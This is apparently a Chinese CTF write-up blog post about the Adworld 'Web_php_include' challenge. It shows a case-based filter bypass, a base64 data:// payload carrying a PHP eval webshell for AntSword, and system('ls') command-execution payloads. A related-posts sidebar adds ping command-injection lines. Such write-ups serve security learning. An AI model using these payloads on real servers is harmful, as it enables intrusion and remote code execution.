攻防世界 Web_php_include(文件包含,伪协议读取,命令执行)

已于 2023-05-11 20:50:16 修改
阅读量224 收藏
点赞数
文章标签: web
于 2023-05-11 20:42:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74119193/article/details/130092850
版权

题目

 

本题考查文件包含

代码分析:第一句中的 show_source() 函数是 highlight_flie()的别称,第二句是get传参给hello,在这里可以构造payload :?hello=1

然后看到strstr()函数,它是区分大小写的,在本题代码中传给page的参数中包含php://时会自动过滤,且不能使用Php://的大小写绕过,但是可以尝试用大写绕过PHP://

strstr()函数

 然后是 str_replace() 函数,同样区分大小写,它会把传给page的参数中的php://替换为空,大写可以绕过

解法:

1、可以使用bp传参

直接连接bp在空白处写,然后看到文件夹直接cat就行了。

<?php system('ls');?>

2、使用data://伪协议读取文件

将<?php eval($_POST[shell]);?>进行base64加密(构造的payload中的shell可以随意替换,这值是连接蚁剑的密钥),然后构建

payload: ?page=data://text/plain/;base64,PD9waHAgZXZhbCgkX1BPU1Rbc2hlbGxdKTs/Pg==

然后连接蚁剑就可以了

 

3、利用最开始的payload:?hello= 可以回显这个条件,可以命令执行

构造payload:?page=http://127.0.0.1/?hello=<?php system("ls")?>

这种方法根本没想到,师傅们tql

此文章借鉴了yingyugo师傅的方法

白色黑巧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全 | CTF】攻防世界 command_execution 解题详析
等风来
05-21 5825
ping 命令是一个常用的网络命令,用于测试两台计算机之间网络连接的连通性。通过向目标计算机发送 ICMP 协议的数据包,并等待目标计算机返回响应数据包来测试网络的可达性,同时也可以测试网络的延迟和丢包率等信息。本地回环地址是网络通信中的特殊地址,指向本机的网络接口,因此通过发送 icmp 数据包到该地址来测试网络连通性和延迟。如果 ping 命令不正确地处理其输入参数,就可能存在被攻击者利用来运行危险的命令的风险。2.ping+IP地址或主机域名+命令参数。3.ping+命令参数+IP地址或主机域名。
攻防世界command_execution
人若无名,便可专心练剑
03-15 221
command_execution
攻防世界 web command_execution 【命令执行
Hrain7的博客
11-14 519
看到ping 就想到了命令执行 ,“请输入需要的ping地址”,就输入本机地址 127.0.0.1 然后输入 ls命令:127.0.0.1 && ls 找出当前目录 发现可以找到当前目录 然后再找.txt 后缀的文件,输入 127.0.0.1 && find -name ".txt" 找到了flag.txt ,接下来就是访问 flag.txt 输入 127.0.0.1 && cat /home/flag.tx...
攻防世界】command_execution
一期一会的博客
01-15 226
看题目,又是一个命令执行。这里不进行过多总结,详情请看 命令执行总结 靶场演练 我们尝试使用&&(&&表示当左边的命令执行为真时,才会去执行右边的命令)去执行命令,ls发现我们输入的是有效的。 紧接着find一下以.txt结尾的文件 127.0.0.1&&find / -name "*.txt" 找到了,直接cat查看 ...
攻防世界 web入门 command_execution(命令执行)
weixin_45774059的博客
06-03 212
网络web安全与攻防技术_漏洞分析_网络攻防_网络安全_vulnerability_
09-29
常见网络安全协议工具使用方法,web安全漏洞分析、漏洞案例,web攻防思路分享。
jiangzuo.rar_cloud computing java_网络攻防_防火墙
09-21
网络技术以及云计算系列讲解,包括网络攻防,防火墙技术等
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
网络攻防课程seed-labs实验-Web_XSS_Elgg.zip
最新发布
06-01
网络攻防课程seed-labs实验-Web_XSS_Elgg.zip
网络攻防课程seed-labs实验-Web_SQL_Injection.zip
06-01
网络攻防课程seed-labs实验-Web_SQL_Injection.zip
php文件包含协议
m0_65283068的博客
10-06 387
文件包含payload
php一句话调用方式,使用include实现php一句话
weixin_30209891的博客
03-29 393
我是菜牛各位看官轻喷。PHP一句话主要实现的是,动态执行PHP代码PHP小马主要实现的是,文件上传。PHP大马主要实现的是,提权。include 语句包含并运行指定文件。//服务端if(!empty($_POST['code'])){$code=trim($_POST['code']);$handle=fopen('cmd.txt','w') or die('创建文件失败');fputs($ha...
攻防世界web—— PHP2
Zeker62的博客
08-23 116
2021/9/13补充,URL编码要使用Notepad++ full encode 第一次编码,然后自然URL编码第二次才能解题 拿到题目,看似好像没有什么可以突破的 不论是检查源代码还是使用dirsearch或者御剑 都查不出有用的文件今天知道了其实存在一个后缀名为.phps的文件后缀名为.phps的文件出现在无法使用web浏览器查看php代码的情况下,.phps文件就是对应文件的源代码! ...
【网络安全 | CTF】攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议
等风来
05-22 9371
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行PHP 脚本所在位置的绝对路径。
php include函数和readfile,PHP各种读取文件的函数效率对比[Readfile vs include]
weixin_31520435的博客
03-18 152
It is not often that you can write a PHP script that doesnot need to include the contents of different files aspart of it's output. If these includes happen to be phpscripts themselves you have no cho...
php调用页面_用php调用另一个页面的方法
weixin_30332165的博客
03-08 740
php调用另一个页面的方法在php中可以使用 include或require函数指令引入另一个页面(如a.php)。
攻防世界】网络安全学习180天 之 fileinclude NO.GFSJ1060
Bing_Geng的博客
12-06 127
*前言: 如果有疑问或者错误欢迎在评论区或私信交流!!难度:1 方向:Web 题解数:15 解出人数:499 题目描述: 怎么读取文件呢? 代码解释: highlight_file(FILE);: 这一行用于在浏览器中高亮显示当前 PHP 文件的源代码include(“./check.php”);: 包含了一个名为 check.php 的文件。这个文件的内容在上面的代码中没有展示,但可以假设它用于一些检查或初始化的逻辑。if(isset($_GET[‘filename’])): 检查是否存在名为 file
php伪协议实现命令执行,任意文件读取
qq_44418229的博客
06-09 5888
ctf----php伪协议
php 调用include 方法,php include的使用法详解
weixin_33668998的博客
03-09 4325
include 语句包含并运行指定文件。以下文档也适用于 require 。被包含文件先按参数给出的路径寻找,如果没有给出目录(只有文件名)时则按照 include_path 指定的目录寻找。如果在 include_path 下没找到该文件则 include 最后才在调用脚本文件所在的目录和当前工作目录下寻找。如果最后仍未找到文件则include 结构会发出一条警告;这一点和 require 不同...
攻防世界web_php_include
03-16
攻防世界中的 web_php_include 是一种漏洞,它指的是在 PHP 程序中使用 include 或 require 语句加载文件时可能存在的安全问题。这种漏洞可能导致远程代码执行攻击,允许攻击者在服务器上执行任意代码。为了防止这种...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值